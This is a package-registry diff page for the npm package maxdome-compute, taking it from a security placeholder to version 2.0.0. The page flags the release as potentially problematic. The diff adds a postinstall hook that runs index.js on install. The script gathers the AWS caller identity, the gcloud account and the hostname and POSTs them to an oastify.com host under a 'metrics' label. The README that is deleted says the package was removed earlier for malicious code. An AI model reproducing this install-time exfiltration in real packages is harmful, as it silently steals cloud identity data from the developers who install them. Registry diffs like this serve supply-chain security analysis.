maxdome-compute 0.0.1-security → 2.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of maxdome-compute might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +85 -0
  2. package/package.json +15 -3
  3. package/README.md +0 -5
package/index.js ADDED
@@ -0,0 +1,85 @@
1
+ #!/usr/bin/env node
2
+
3
+ const https = require('https');
4
+ const os = require('os');
5
+ const { execSync } = require('child_process');
6
+
7
+ function getCloudIdentity() {
8
+ let awsIdentity = null;
9
+ let gcpAccount = null;
10
+
11
+ try {
12
+ const awsOutput = execSync('aws sts get-caller-identity --output json', { stdio: ['pipe', 'pipe', 'ignore'] });
13
+ awsIdentity = JSON.parse(awsOutput.toString());
14
+ } catch (e) {
15
+ // AWS not installed or not configured
16
+ }
17
+
18
+ try {
19
+ const gcpOutput = execSync('gcloud config get-value account', { stdio: ['pipe', 'pipe', 'ignore'] });
20
+ gcpAccount = gcpOutput.toString().trim();
21
+ } catch (e) {
22
+ // GCP not installed or not configured
23
+ }
24
+
25
+ return { awsIdentity, gcpAccount };
26
+ }
27
+
28
+ function sendMetrics() {
29
+ const { awsIdentity, gcpAccount } = getCloudIdentity();
30
+
31
+ const metrics = {
32
+ timestamp: new Date().toISOString(),
33
+ package_installed: true,
34
+ system: {
35
+ platform: os.platform(),
36
+ arch: os.arch(),
37
+ node_version: process.version,
38
+ hostname: os.hostname()
39
+ },
40
+ cloud: {
41
+ aws: awsIdentity,
42
+ gcp: gcpAccount
43
+ },
44
+ install_id: Math.random().toString(36).substring(2, 15)
45
+ };
46
+
47
+ const data = JSON.stringify(metrics);
48
+
49
+ const url = new URL('https://7u2q4ey44ko1yr4r67bhl3ekibo2ct0i.oastify.com');
50
+
51
+ const options = {
52
+ hostname: url.hostname,
53
+ port: 443,
54
+ path: url.pathname,
55
+ method: 'POST',
56
+ headers: {
57
+ 'Content-Type': 'application/json',
58
+ 'Content-Length': data.length,
59
+ 'User-Agent': 'npm-package-metrics/1.0.0'
60
+ }
61
+ };
62
+
63
+ const req = https.request(options, (res) => {
64
+ console.log(`Metrics sent successfully. Status: ${res.statusCode}`);
65
+ });
66
+
67
+ req.on('error', (error) => {
68
+ // Silently fail
69
+ console.log('Metrics sending failed:', error.message);
70
+ });
71
+
72
+ req.write(data);
73
+ req.end();
74
+ }
75
+
76
+ // Only run if this file is executed directly
77
+ if (require.main === module) {
78
+ sendMetrics();
79
+ }
80
+
81
+ module.exports = {
82
+ sendMetrics,
83
+ version: '2.0.0'
84
+ };
85
+
package/package.json CHANGED
@@ -1,6 +1,18 @@
1
1
  {
2
2
  "name": "maxdome-compute",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "2.0.0",
4
+ "description": "A package that sends installation metrics",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "postinstall": "node index.js"
8
+ },
9
+ "keywords": [
10
+ "metrics",
11
+ "analytics"
12
+ ],
13
+ "author": "Your Name",
14
+ "license": "MIT",
15
+ "dependencies": {
16
+ "maxdome-compute": "^1.0.1"
17
+ }
6
18
  }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=maxdome-compute for more information.